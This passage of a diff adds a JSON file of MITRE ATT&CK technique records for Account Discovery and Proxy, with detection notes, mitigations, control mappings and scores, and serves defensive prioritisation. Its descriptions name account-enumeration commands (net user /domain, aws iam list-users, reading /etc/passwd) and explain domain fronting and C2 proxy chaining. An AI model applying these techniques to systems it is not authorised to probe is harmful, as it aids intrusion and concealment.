+        "network_coverage": false,
+        "file_coverage": false,
+        "cloud_coverage": false,
+        "hardware_coverage": false,
+        "actionability_score": {
+            "combined_score": 0.07142857142857142,
+            "detection_score": 0.15
+        },
+        "choke_point_score": 0.25,
+        "prevalence_score": 0.0584645
+    },
+    {
+        "tid": "T1087",
+        "name": "Account Discovery",
+        "description": "Adversaries may attempt to get a listing of accounts on a system or within an environment. This information can help adversaries determine which accounts exist to aid in follow-on behavior.",
+        "url": "https://attack.mitre.org/techniques/T1087",
+        "tactics": [
+            "Discovery"
+        ],
+        "detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.\n\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).\n\nMonitor for processes that can be used to enumerate user accounts, such as net.exe and net1.exe, especially when executed in quick succession.(Citation: Elastic - Koadiac Detection with EQL)",
+        "platforms": [
+            "Azure AD",
+            "Google Workspace",
+            "IaaS",
+            "Linux",
+            "Office 365",
+            "SaaS",
+            "Windows",
+            "macOS"
+        ],
+        "data_sources": [
+            "Command: Command Execution",
+            "File: File Access",
+            "Process: Process Creation",
+            "User Account: User Account Metadata"
+        ],
+        "is_subtechnique": false,
+        "supertechnique": null,
+        "subtechniques": [
+            {
+                "tid": "T1087.001",
+                "name": "Account Discovery: Local Account",
+                "url": "https://attack.mitre.org/techniques/T1087/001",
+                "description": "Adversaries may attempt to get a listing of local system accounts. This information can help adversaries determine which local accounts exist on a system to aid in follow-on behavior.\n\nCommands such as net user and net localgroup of the [Net](https://attack.mitre.org/software/S0039) utility and id and groupson macOS and Linux can list local users and groups. On Linux, local users can also be enumerated through the use of the /etc/passwd file. On macOS the dscl . list /Users command can be used to enumerate local accounts.",
+                "detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.\n\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).\n\nMonitor for processes that can be used to enumerate user accounts, such as net.exe and net1.exe, especially when executed in quick succession.(Citation: Elastic - Koadiac Detection with EQL)",
+                "mitigations": [
+                    {
+                        "mid": "M1028",
+                        "name": "Operating System Configuration",
+                        "description": "Make configuration changes related to the operating system or a common feature of the operating system that result in system hardening against techniques.",
+                        "url": "https://attack.mitre.org/mitigations/M1028"
+                    }
+                ]
+            },
+            {
+                "tid": "T1087.002",
+                "name": "Account Discovery: Domain Account",
+                "url": "https://attack.mitre.org/techniques/T1087/002",
+                "description": "Adversaries may attempt to get a listing of domain accounts. This information can help adversaries determine which domain accounts exist to aid in follow-on behavior.\n\nCommands such as net user /domain and net group /domain of the [Net](https://attack.mitre.org/software/S0039) utility, dscacheutil -q groupon macOS, and ldapsearch on Linux can list domain users and groups.",
+                "detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.\n\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).\n",
+                "mitigations": [
+                    {
+                        "mid": "M1028",
+                        "name": "Operating System Configuration",
+                        "description": "Make configuration changes related to the operating system or a common feature of the operating system that result in system hardening against techniques.",
+                        "url": "https://attack.mitre.org/mitigations/M1028"
+                    }
+                ]
+            },
+            {
+                "tid": "T1087.003",
+                "name": "Account Discovery: Email Account",
+                "url": "https://attack.mitre.org/techniques/T1087/003",
+                "description": "Adversaries may attempt to get a listing of email addresses and accounts. Adversaries may try to dump Exchange address lists such as global address lists (GALs).(Citation: Microsoft Exchange Address Lists)\n\nIn on-premises Exchange and Exchange Online, theGet-GlobalAddressList PowerShell cmdlet can be used to obtain email addresses and accounts from a domain using an authenticated session.(Citation: Microsoft getglobaladdresslist)(Citation: Black Hills Attacking Exchange MailSniper, 2016)\n\nIn Google Workspace, the GAL is shared with Microsoft Outlook users through the Google Workspace Sync for Microsoft Outlook (GWSMO) service. Additionally, the Google Workspace Directory allows for users to get a listing of other users within the organization.(Citation: Google Workspace Global Access List)",
+                "detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.\n\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).",
+                "mitigations": []
+            },
+            {
+                "tid": "T1087.004",
+                "name": "Account Discovery: Cloud Account",
+                "url": "https://attack.mitre.org/techniques/T1087/004",
+                "description": "Adversaries may attempt to get a listing of cloud accounts. Cloud accounts are those created and configured by an organization for use by users, remote support, services, or for administration of resources within a cloud service provider or SaaS application.\n\nWith authenticated access there are several tools that can be used to find accounts. The Get-MsolRoleMember PowerShell cmdlet can be used to obtain account names given a role or permissions group in Office 365.(Citation: Microsoft msolrolemember)(Citation: GitHub Raindance) The Azure CLI (AZ CLI) also provides an interface to obtain user accounts with authenticated access to a domain. The command az ad user list will list all users within a domain.(Citation: Microsoft AZ CLI)(Citation: Black Hills Red Teaming MS AD Azure, 2018) \n\nThe AWS command aws iam list-users may be used to obtain a list of users in the current account while aws iam list-roles can obtain IAM roles that have a specified path prefix.(Citation: AWS List Roles)(Citation: AWS List Users) In GCP, gcloud iam service-accounts list and gcloud projects get-iam-policy may be used to obtain a listing of service accounts and users in a project.(Citation: Google Cloud - IAM Servie Accounts List API)",
+                "detection": "Monitor processes, command-line arguments, and logs for actions that could be taken to gather information about cloud accounts, including the use of calls to cloud APIs that perform account discovery.\n\nSystem and network discovery techniques normally occur throughout an operation as an adversary learns the environment, and also to an extent in normal network operations. Therefore discovery data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.",
+                "mitigations": [
+                    {
+                        "mid": "M1047",
+                        "name": "Audit",
+                        "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.",
+                        "url": "https://attack.mitre.org/mitigations/M1047"
+                    },
+                    {
+                        "mid": "M1018",
+                        "name": "User Account Management",
+                        "description": "Manage the creation, modification, use, and permissions associated to user accounts.",
+                        "url": "https://attack.mitre.org/mitigations/M1018"
+                    }
+                ]
+            }
+        ],
+        "mitigations": [
+            {
+                "mid": "M1028",
+                "name": "Operating System Configuration",
+                "description": "Make configuration changes related to the operating system or a common feature of the operating system that result in system hardening against techniques.",
+                "url": "https://attack.mitre.org/mitigations/M1028"
+            }
+        ],
+        "cumulative_score": 0.4758577114285714,
+        "adjusted_score": 0.4758577114285714,
+        "has_car": false,
+        "has_sigma": true,
+        "has_es_siem": true,
+        "has_splunk": true,
+        "cis_controls": [
+            "4.1",
+            "4.8",
+            "18.3",
+            "18.5"
+        ],
+        "nist_controls": [
+            "CM-6",
+            "CM-7",
+            "SI-4"
+        ],
+        "process_coverage": true,
+        "network_coverage": false,
+        "file_coverage": true,
+        "cloud_coverage": false,
+        "hardware_coverage": false,
+        "actionability_score": {
+            "combined_score": 0.2714285714285714,
+            "mitigation_score": 0.12727272727272726,
+            "detection_score": 0.43
+        },
+        "choke_point_score": 0.1,
+        "prevalence_score": 0.10442914
+    },
+    {
+        "tid": "T1087.001",
+        "name": "Account Discovery: Local Account",
+        "description": "Adversaries may attempt to get a listing of local system accounts. This information can help adversaries determine which local accounts exist on a system to aid in follow-on behavior.\n\nCommands such as net user and net localgroup of the [Net](https://attack.mitre.org/software/S0039) utility and id and groupson macOS and Linux can list local users and groups. On Linux, local users can also be enumerated through the use of the /etc/passwd file. On macOS the dscl . list /Users command can be used to enumerate local accounts.",
+        "url": "https://attack.mitre.org/techniques/T1087/001",
+        "tactics": [
+            "Discovery"
+        ],
+        "detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.\n\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).\n\nMonitor for processes that can be used to enumerate user accounts, such as net.exe and net1.exe, especially when executed in quick succession.(Citation: Elastic - Koadiac Detection with EQL)",
+        "platforms": [
+            "Linux",
+            "Windows",
+            "macOS"
+        ],
+        "data_sources": [
+            "Command: Command Execution",
+            "File: File Access",
+            "Process: Process Creation"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1087",
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1028",
+                "name": "Operating System Configuration",
+                "description": "Make configuration changes related to the operating system or a common feature of the operating system that result in system hardening against techniques.",
+                "url": "https://attack.mitre.org/mitigations/M1028"
+            }
+        ],
+        "cumulative_score": 0.28095238095238095,
+        "adjusted_score": 0.28095238095238095,
+        "has_car": true,
+        "has_sigma": true,
+        "has_es_siem": false,
+        "has_splunk": true,
+        "cis_controls": [
+            "4.1",
+            "4.8",
+            "18.3",
+            "18.5"
+        ],
+        "nist_controls": [
+            "CM-6",
+            "CM-7",
+            "SI-4"
+        ],
+        "process_coverage": true,
+        "network_coverage": false,
+        "file_coverage": true,
+        "cloud_coverage": false,
+        "hardware_coverage": false
+    },
+    {
+        "tid": "T1087.002",
+        "name": "Account Discovery: Domain Account",
+        "description": "Adversaries may attempt to get a listing of domain accounts. This information can help adversaries determine which domain accounts exist to aid in follow-on behavior.\n\nCommands such as net user /domain and net group /domain of the [Net](https://attack.mitre.org/software/S0039) utility, dscacheutil -q groupon macOS, and ldapsearch on Linux can list domain users and groups.",
+        "url": "https://attack.mitre.org/techniques/T1087/002",
+        "tactics": [
+            "Discovery"
+        ],
+        "detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.\n\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).\n",
+        "platforms": [
+            "Linux",
+            "Windows",
+            "macOS"
+        ],
+        "data_sources": [
+            "Command: Command Execution",
+            "Process: Process Creation"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1087",
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1028",
+                "name": "Operating System Configuration",
+                "description": "Make configuration changes related to the operating system or a common feature of the operating system that result in system hardening against techniques.",
+                "url": "https://attack.mitre.org/mitigations/M1028"
+            }
+        ],
+        "cumulative_score": 0.34285714285714286,
+        "adjusted_score": 0.34285714285714286,
+        "has_car": true,
+        "has_sigma": true,
+        "has_es_siem": true,
+        "has_splunk": true,
+        "cis_controls": [
+            "4.1",
+            "4.8",
+            "18.3",
+            "18.5"
+        ],
+        "nist_controls": [
+            "CM-6",
+            "CM-7",
+            "SI-4"
+        ],
+        "process_coverage": true,
+        "network_coverage": true,
+        "file_coverage": true,
+        "cloud_coverage": false,
+        "hardware_coverage": false
+    },
+    {
+        "tid": "T1087.003",
+        "name": "Account Discovery: Email Account",
+        "description": "Adversaries may attempt to get a listing of email addresses and accounts. Adversaries may try to dump Exchange address lists such as global address lists (GALs).(Citation: Microsoft Exchange Address Lists)\n\nIn on-premises Exchange and Exchange Online, theGet-GlobalAddressList PowerShell cmdlet can be used to obtain email addresses and accounts from a domain using an authenticated session.(Citation: Microsoft getglobaladdresslist)(Citation: Black Hills Attacking Exchange MailSniper, 2016)\n\nIn Google Workspace, the GAL is shared with Microsoft Outlook users through the Google Workspace Sync for Microsoft Outlook (GWSMO) service. Additionally, the Google Workspace Directory allows for users to get a listing of other users within the organization.(Citation: Google Workspace Global Access List)",
+        "url": "https://attack.mitre.org/techniques/T1087/003",
+        "tactics": [
+            "Discovery"
+        ],
+        "detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.\n\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).",
+        "platforms": [
+            "Google Workspace",
+            "Office 365",
+            "Windows"
+        ],
+        "data_sources": [
+            "Command: Command Execution",
+            "User Account: User Account Metadata"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1087",
+        "subtechniques": [],
+        "mitigations": [],
+        "cumulative_score": 0.1,
+        "adjusted_score": 0.1,
+        "has_car": false,
+        "has_sigma": false,
+        "has_es_siem": false,
+        "has_splunk": false,
+        "cis_controls": [],
+        "nist_controls": [],
+        "process_coverage": true,
+        "network_coverage": false,
+        "file_coverage": false,
+        "cloud_coverage": false,
+        "hardware_coverage": false
+    },
+    {
+        "tid": "T1087.004",
+        "name": "Account Discovery: Cloud Account",
+        "description": "Adversaries may attempt to get a listing of cloud accounts. Cloud accounts are those created and configured by an organization for use by users, remote support, services, or for administration of resources within a cloud service provider or SaaS application.\n\nWith authenticated access there are several tools that can be used to find accounts. The Get-MsolRoleMember PowerShell cmdlet can be used to obtain account names given a role or permissions group in Office 365.(Citation: Microsoft msolrolemember)(Citation: GitHub Raindance) The Azure CLI (AZ CLI) also provides an interface to obtain user accounts with authenticated access to a domain. The command az ad user list will list all users within a domain.(Citation: Microsoft AZ CLI)(Citation: Black Hills Red Teaming MS AD Azure, 2018) \n\nThe AWS command aws iam list-users may be used to obtain a list of users in the current account while aws iam list-roles can obtain IAM roles that have a specified path prefix.(Citation: AWS List Roles)(Citation: AWS List Users) In GCP, gcloud iam service-accounts list and gcloud projects get-iam-policy may be used to obtain a listing of service accounts and users in a project.(Citation: Google Cloud - IAM Servie Accounts List API)",
+        "url": "https://attack.mitre.org/techniques/T1087/004",
+        "tactics": [
+            "Discovery"
+        ],
+        "detection": "Monitor processes, command-line arguments, and logs for actions that could be taken to gather information about cloud accounts, including the use of calls to cloud APIs that perform account discovery.\n\nSystem and network discovery techniques normally occur throughout an operation as an adversary learns the environment, and also to an extent in normal network operations. Therefore discovery data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.",
+        "platforms": [
+            "Azure AD",
+            "Google Workspace",
+            "IaaS",
+            "Office 365",
+            "SaaS"
+        ],
+        "data_sources": [
+            "Command: Command Execution",
+            "User Account: User Account Metadata"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1087",
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1047",
+                "name": "Audit",
+                "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.",
+                "url": "https://attack.mitre.org/mitigations/M1047"
+            },
+            {
+                "mid": "M1018",
+                "name": "User Account Management",
+                "description": "Manage the creation, modification, use, and permissions associated to user accounts.",
+                "url": "https://attack.mitre.org/mitigations/M1018"
+            }
+        ],
+        "cumulative_score": 0.2571428571428572,
+        "adjusted_score": 0.2571428571428572,
+        "has_car": false,
+        "has_sigma": true,
+        "has_es_siem": false,
+        "has_splunk": false,
+        "cis_controls": [
+            "3.3",
+            "4.1",
+            "4.7",
+            "5.3",
+            "5.4",
+            "6.1",
+            "6.2",
+            "6.8",
+            "18.3",
+            "18.5"
+        ],
+        "nist_controls": [
+            "AC-2",
+            "AC-3",
+            "AC-5",
+            "AC-6",
+            "IA-2",
+            "IA-8"
+        ],
+        "process_coverage": true,
+        "network_coverage": false,
+        "file_coverage": false,
+        "cloud_coverage": false,
+        "hardware_coverage": false
+    },
+    {
+        "tid": "T1090",
+        "name": "Proxy",
+        "description": "Adversaries may use a connection proxy to direct network traffic between systems or act as an intermediary for network communications to a command and control server to avoid direct connections to their infrastructure. Many tools exist that enable traffic redirection through proxies or port redirection, including [HTRAN](https://attack.mitre.org/software/S0040), ZXProxy, and ZXPortMap. (Citation: Trend Micro APT Attack Tools) Adversaries use these types of proxies to manage command and control communications, reduce the number of simultaneous outbound network connections, provide resiliency in the face of connection loss, or to ride over existing trusted communications paths between victims to avoid suspicion. Adversaries may chain together multiple proxies to further disguise the source of malicious traffic.\n\nAdversaries can also take advantage of routing schemes in Content Delivery Networks (CDNs) to proxy command and control traffic.",
+        "url": "https://attack.mitre.org/techniques/T1090",
+        "tactics": [
+            "Command And Control"
+        ],
+        "detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server or between clients that should not or often do not communicate with one another). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. (Citation: University of Birmingham C2)\n\nConsider monitoring for traffic to known anonymity networks (such as [Tor](https://attack.mitre.org/software/S0183)).",
+        "platforms": [
+            "Linux",
+            "Network",
+            "Windows",
+            "macOS"
+        ],
+        "data_sources": [
+            "Network Traffic: Network Connection Creation",
+            "Network Traffic: Network Traffic Content",
+            "Network Traffic: Network Traffic Flow"
+        ],
+        "is_subtechnique": false,
+        "supertechnique": null,
+        "subtechniques": [
+            {
+                "tid": "T1090.001",
+                "name": "Proxy: Internal Proxy",
+                "url": "https://attack.mitre.org/techniques/T1090/001",
+                "description": "Adversaries may use an internal proxy to direct command and control traffic between two or more systems in a compromised environment. Many tools exist that enable traffic redirection through proxies or port redirection, including [HTRAN](https://attack.mitre.org/software/S0040), ZXProxy, and ZXPortMap. (Citation: Trend Micro APT Attack Tools) Adversaries use internal proxies to manage command and control communications inside a compromised environment, to reduce the number of simultaneous outbound network connections, to provide resiliency in the face of connection loss, or to ride over existing trusted communications paths between infected systems to avoid suspicion. Internal proxy connections may use common peer-to-peer (p2p) networking protocols, such as SMB, to better blend in with the environment.\n\nBy using a compromised internal system as a proxy, adversaries may conceal the true destination of C2 traffic while reducing the need for numerous connections to external systems.",
+                "detection": "Analyze network data for uncommon data flows between clients that should not or often do not communicate with one another. Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used.(Citation: University of Birmingham C2)",
+                "mitigations": [
+                    {
+                        "mid": "M1031",
+                        "name": "Network Intrusion Prevention",
+                        "description": "Use intrusion detection signatures to block traffic at network boundaries.",
+                        "url": "https://attack.mitre.org/mitigations/M1031"
+                    }
+                ]
+            },
+            {
+                "tid": "T1090.002",
+                "name": "Proxy: External Proxy",
+                "url": "https://attack.mitre.org/techniques/T1090/002",
+                "description": "Adversaries may use an external proxy to act as an intermediary for network communications to a command and control server to avoid direct connections to their infrastructure. Many tools exist that enable traffic redirection through proxies or port redirection, including [HTRAN](https://attack.mitre.org/software/S0040), ZXProxy, and ZXPortMap. (Citation: Trend Micro APT Attack Tools) Adversaries use these types of proxies to manage command and control communications, to provide resiliency in the face of connection loss, or to ride over existing trusted communications paths to avoid suspicion.\n\nExternal connection proxies are used to mask the destination of C2 traffic and are typically implemented with port redirectors. Compromised systems outside of the victim environment may be used for these purposes, as well as purchased infrastructure such as cloud-based resources or virtual private servers. Proxies may be chosen based on the low likelihood that a connection to them from a compromised system would be investigated. Victim systems would communicate directly with the external proxy on the Internet and then the proxy would forward communications to the C2 server.",
+                "detection": "Analyze network data for uncommon data flows, such as a client sending significantly more data than it receives from an external server. Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used.(Citation: University of Birmingham C2)",
+                "mitigations": [
+                    {
+                        "mid": "M1031",
+                        "name": "Network Intrusion Prevention",
+                        "description": "Use intrusion detection signatures to block traffic at network boundaries.",
+                        "url": "https://attack.mitre.org/mitigations/M1031"
+                    }
+                ]
+            },
+            {
+                "tid": "T1090.003",
+                "name": "Proxy: Multi-hop Proxy",
+                "url": "https://attack.mitre.org/techniques/T1090/003",
+                "description": "To disguise the source of malicious traffic, adversaries may chain together multiple proxies. Typically, a defender will be able to identify the last proxy traffic traversed before it enters their network; the defender may or may not be able to identify any previous proxies before the last-hop proxy. This technique makes identifying the original source of the malicious traffic even more difficult by requiring the defender to trace malicious traffic through several proxies to identify its source. A particular variant of this behavior is to use onion routing networks, such as the publicly available TOR network. (Citation: Onion Routing)\n\nIn the case of network infrastructure, particularly routers, it is possible for an adversary to leverage multiple compromised devices to create a multi-hop proxy chain within the Wide-Area Network (WAN) of the enterprise.  By leveraging [Patch System Image](https://attack.mitre.org/techniques/T1601/001), adversaries can add custom code to the affected network devices that will implement onion routing between those nodes.  This custom onion routing network will transport the encrypted C2 traffic through the compromised population, allowing adversaries to communicate with any device within the onion routing network.  This method is dependent upon the [Network Boundary Bridging](https://attack.mitre.org/techniques/T1599) method in order to allow the adversaries to cross the protected network boundary of the Internet perimeter and into the organization’s WAN. Protocols such as ICMP may be used as a transport.",
+                "detection": "When observing use of Multi-hop proxies, network data from the actual command and control servers could allow correlating incoming and outgoing flows to trace malicious traffic back to its source. Multi-hop proxies can also be detected by alerting on traffic to known anonymity networks (such as [Tor](https://attack.mitre.org/software/S0183)) or known adversary infrastructure that uses this technique.\n\nIn context of network devices, monitor traffic for encrypted communications from the Internet that is addressed to border routers.  Compare this traffic with the configuration to determine whether it matches with any configured site-to-site Virtual Private Network (VPN) connections the device was intended to have. Monitor traffic for encrypted communications originating from potentially breached routers that is addressed to other routers within the organization.  Compare the source and destination with the configuration of the device to determine if these channels are an authorized Virtual Private Network (VPN) connections or other encrypted modes of communication. Monitor ICMP traffic from the Internet that is addressed to border routers and is encrypted.  Few if any legitimate use cases exist for sending encrypted data to a network device via ICMP.",
+                "mitigations": [
+                    {
+                        "mid": "M1037",
+                        "name": "Filter Network Traffic",
+                        "description": "Use network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic.",
+                        "url": "https://attack.mitre.org/mitigations/M1037"
+                    }
+                ]
+            },
+            {
+                "tid": "T1090.004",
+                "name": "Proxy: Domain Fronting",
+                "url": "https://attack.mitre.org/techniques/T1090/004",
+                "description": "Adversaries may take advantage of routing schemes in Content Delivery Networks (CDNs) and other services which host multiple domains to obfuscate the intended destination of HTTPS traffic or traffic tunneled through HTTPS. (Citation: Fifield Blocking Resistent Communication through domain fronting 2015) Domain fronting involves using different domain names in the SNI field of the TLS header and the Host field of the HTTP header. If both domains are served from the same CDN, then the CDN may route to the address specified in the HTTP header after unwrapping the TLS header. A variation of the the technique, \"domainless\" fronting, utilizes a SNI field that is left blank; this may allow the fronting to work even when the CDN attempts to validate that the SNI and HTTP Host fields match (if the blank SNI fields are ignored).\n\nFor example, if domain-x and domain-y are customers of the same CDN, it is possible to place domain-x in the TLS header and domain-y in the HTTP header. Traffic will appear to be going to domain-x, however the CDN may route it to domain-y.",
+                "detection": "If SSL inspection is in place or the traffic is not encrypted, the Host field of the HTTP header can be checked if it matches the HTTPS SNI or against a blocklist or allowlist of domain names. (Citation: Fifield Blocking Resistent Communication through domain fronting 2015)",
+                "mitigations": [
+                    {
+                        "mid": "M1020",
+                        "name": "SSL/TLS Inspection",
+                        "description": "Break and inspect SSL/TLS sessions to look at encrypted web traffic for adversary activity.",
+                        "url": "https://attack.mitre.org/mitigations/M1020"
+                    }
+                ]
+            }
+        ],
+        "mitigations": [
+            {
+                "mid": "M1037",
+                "name": "Filter Network Traffic",
+                "description": "Use network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic.",
+                "url": "https://attack.mitre.org/mitigations/M1037"
+            },
+            {
+                "mid": "M1031",
+                "name": "Network Intrusion Prevention",
+                "description": "Use intrusion detection signatures to block traffic at network boundaries.",
+                "url": "https://attack.mitre.org/mitigations/M1031"
+            },
+            {
+                "mid": "M1020",
+                "name": "SSL/TLS Inspection",
+                "description": "Break and inspect SSL/TLS sessions to look at encrypted web traffic for adversary activity.",
+                "url": "https://attack.mitre.org/mitigations/M1020"
+            }
+        ],
+        "cumulative_score": 1.3928571428571428,
+        "adjusted_score": 1.3928571428571428,
+        "has_car": false,
+        "has_sigma": true,
+        "has_es_siem": true,
+        "has_splunk": true,
+        "cis_controls": [
+            "4.2",
+            "4.4",
+            "9.3",
+            "13.3",
+            "13.4",
+            "13.8"
+        ],
+        "nist_controls": [
+            "AC-3",
+            "AC-4",
+            "CA-7",
+            "CM-2",
+            "CM-6",
+            "CM-7",
+            "SC-7",
+            "SC-8",
+            "SI-10",
+            "SI-15",
+            "SI-3",
+            "SI-4"
+        ],
+        "process_coverage": false,
+        "network_coverage": true,
+        "file_coverage": false,
+        "cloud_coverage": false,
+        "hardware_coverage": false,
+        "actionability_score": {
+            "combined_score": 0.24285714285714285,
+            "mitigation_score": 0.32727272727272727,
+            "detection_score": 0.15
+        },
+        "choke_point_score": 0.15000000000000002,
+        "prevalence_score": 1
+    },
+    {
+        "tid": "T1090.001",
+        "name": "Proxy: Internal Proxy",
+        "description": "Adversaries may use an internal proxy to direct command and control traffic between two or more systems in a compromised environment. Many tools exist that enable traffic redirection through proxies or port redirection, including [HTRAN](https://attack.mitre.org/software/S0040), ZXProxy, and ZXPortMap. (Citation: Trend Micro APT Attack Tools) Adversaries use internal proxies to manage command and control communications inside a compromised environment, to reduce the number of simultaneous outbound network connections, to provide resiliency in the face of connection loss, or to ride over existing trusted communications paths between infected systems to avoid suspicion. Internal proxy connections may use common peer-to-peer (p2p) networking protocols, such as SMB, to better blend in with the environment.\n\nBy using a compromised internal system as a proxy, adversaries may conceal the true destination of C2 traffic while reducing the need for numerous connections to external systems.",
+        "url": "https://attack.mitre.org/techniques/T1090/001",
+        "tactics": [
+            "Command And Control"
+        ],
+        "detection": "Analyze network data for uncommon data flows between clients that should not or often do not communicate with one another. Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used.(Citation: University of Birmingham C2)",
+        "platforms": [
+            "Linux",
+            "Windows",
+            "macOS"
+        ],
+        "data_sources": [
+            "Network Traffic: Network Connection Creation",
+            "Network Traffic: Network Traffic Content",
+            "Network Traffic: Network Traffic Flow"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1090",
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1031",
+                "name": "Network Intrusion Prevention",
+                "description": "Use intrusion detection signatures to block traffic at network boundaries.",
+                "url": "https://attack.mitre.org/mitigations/M1031"
+            }
+        ],
+        "cumulative_score": 0.20952380952380953,
+        "adjusted_score": 0.20952380952380953,
+        "has_car": false,
+        "has_sigma": true,
+        "has_es_siem": false,
+        "has_splunk": false,
+        "cis_controls": [
+            "13.3",
+            "13.8"
+        ],
+        "nist_controls": [
+            "AC-4",
+            "CA-7",
+            "CM-2",
+            "CM-6",
+            "CM-7",
+            "SC-7",
+            "SI-3",
+            "SI-4"
+        ],
+        "process_coverage": false,
+        "network_coverage": true,
+        "file_coverage": false,
+        "cloud_coverage": false,
+        "hardware_coverage": false
+    },
+    {
+        "tid": "T1090.002",
+        "name": "Proxy: External Proxy",
+        "description": "Adversaries may use an external proxy to act as an intermediary for network communications to a command and control server to avoid direct connections to their infrastructure. Many tools exist that enable traffic redirection through proxies or port redirection, including [HTRAN](https://attack.mitre.org/software/S0040), ZXProxy, and ZXPortMap. (Citation: Trend Micro APT Attack Tools) Adversaries use these types of proxies to manage command and control communications, to provide resiliency in the face of connection loss, or to ride over existing trusted communications paths to avoid suspicion.\n\nExternal connection proxies are used to mask the destination of C2 traffic and are typically implemented with port redirectors. Compromised systems outside of the victim environment may be used for these purposes, as well as purchased infrastructure such as cloud-based resources or virtual private servers. Proxies may be chosen based on the low likelihood that a connection to them from a compromised system would be investigated. Victim systems would communicate directly with the external proxy on the Internet and then the proxy would forward communications to the C2 server.",
+        "url": "https://attack.mitre.org/techniques/T1090/002",
+        "tactics": [
+            "Command And Control"
+        ],
+        "detection": "Analyze network data for uncommon data flows, such as a client sending significantly more data than it receives from an external server. Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used.(Citation: University of Birmingham C2)",
+        "platforms": [
+            "Linux",
+            "Windows",
+            "macOS"
+        ],
+        "data_sources": [
+            "Network Traffic: Network Connection Creation",
+            "Network Traffic: Network Traffic Content",
+            "Network Traffic: Network Traffic Flow"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1090",
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1031",
+                "name": "Network Intrusion Prevention",
+                "description": "Use intrusion detection signatures to block traffic at network boundaries.",
+                "url": "https://attack.mitre.org/mitigations/M1031"
+            }
+        ],
+        "cumulative_score": 0.2,
+        "adjusted_score": 0.2,
+        "has_car": false,
+        "has_sigma": true,
+        "has_es_siem": false,
+        "has_splunk": false,
+        "cis_controls": [
